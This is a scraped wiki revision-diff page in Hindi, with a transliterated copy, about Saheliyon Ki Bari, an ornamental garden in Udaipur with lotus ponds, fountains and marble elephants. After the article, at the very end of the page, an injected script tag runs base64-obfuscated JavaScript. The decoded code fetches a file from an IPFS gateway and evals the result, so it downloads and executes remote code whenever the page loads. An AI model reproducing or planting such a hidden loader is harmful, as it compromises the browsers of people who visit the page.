Difference between revisions of "सहेलियों की बाड़ी उदयपुर"

भारत डिस्कवरी प्रस्तुति
Jump to navigation Jump to search
[unchecked revision][unchecked revision]
m (Text replace - "==सम्बंधित लिंक==" to "==संबंधित लेख==")
Line 1: Line 1:
 +
[[चित्र:Saheliyon-Ki-Bari-Udaipur.jpg|thumb|250px|सहेलियों की बाड़ी, [[उदयपुर]]<br />Saheliyon Ki Bari, Udaipur]]
 
*[[उदयपुर]] [[राजस्थान]] का एक ख़ूबसूरत शहर है और [[उदयपुर पर्यटन]] का सबसे आकर्षक स्थल माना जाता है।  
 
*[[उदयपुर]] [[राजस्थान]] का एक ख़ूबसूरत शहर है और [[उदयपुर पर्यटन]] का सबसे आकर्षक स्थल माना जाता है।  
 
*उदयपुर में सहेलियों की बाड़ी और दासियों के सम्मान में बना बाग एक सजा-धजा बाग है।
 
*उदयपुर में सहेलियों की बाड़ी और दासियों के सम्मान में बना बाग एक सजा-धजा बाग है।
*इस बाग में कमल के तालाब, फव्वारे, संगमरमर के [[हाथी]] और कियोस्क <ref>(kiosques / Kiosk - 'कियोस्क' हवादार छतरी, बरसाती जैसे निर्माण को कहते हैं यह गोल भी हो सकता है और षटकोणीय या पंच कोणीय भी।)</ref> बने हुए हैं।
+
*इस बाग में [[कमल]] के तालाब, फव्वारे, संगमरमर के [[हाथी]] और कियोस्क <ref>(kiosques / Kiosk - 'कियोस्क' हवादार छतरी, बरसाती जैसे निर्माण को कहते हैं यह गोल भी हो सकता है और षटकोणीय या पंच कोणीय भी।)</ref> बने हुए हैं।
 
+
{{लेख प्रगति
 +
|आधार=
 +
|प्रारम्भिक=प्रारम्भिक1
 +
|माध्यमिक=
 +
|पूर्णता=
 +
|शोध=
 +
}}
 
==टीका टिप्पणी और संदर्भ==
 
==टीका टिप्पणी और संदर्भ==
 
<references/>
 
<references/>

Revision as of 09:51, 2 October 2010

[[chitr:Saheliyon-Ki-Bari-Udaipur.jpg|thumb|250px|saheliyoan ki ba di, udayapur
Saheliyon Ki Bari, Udaipur]]

  • udayapur rajasthan ka ek khoobasoorat shahar hai aur udayapur paryatan ka sabase akarshak sthal mana jata hai.
  • udayapur mean saheliyoan ki ba di aur dasiyoan ke samman mean bana bag ek saja-dhaja bag hai.
  • is bag mean kamal ke talab, phavvare, sangamaramar ke hathi aur kiyosk [1] bane hue haian.
panne ki pragati avastha
adhar
prarambhik
madhyamik
poornata
shodh

tika tippani aur sandarbh

  1. (kiosques / Kiosk - 'kiyosk' havadar chhatari, barasati jaise nirman ko kahate haian yah gol bhi ho sakata hai aur shatakoniy ya panch koniy bhi.)

sanbandhit lekh

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>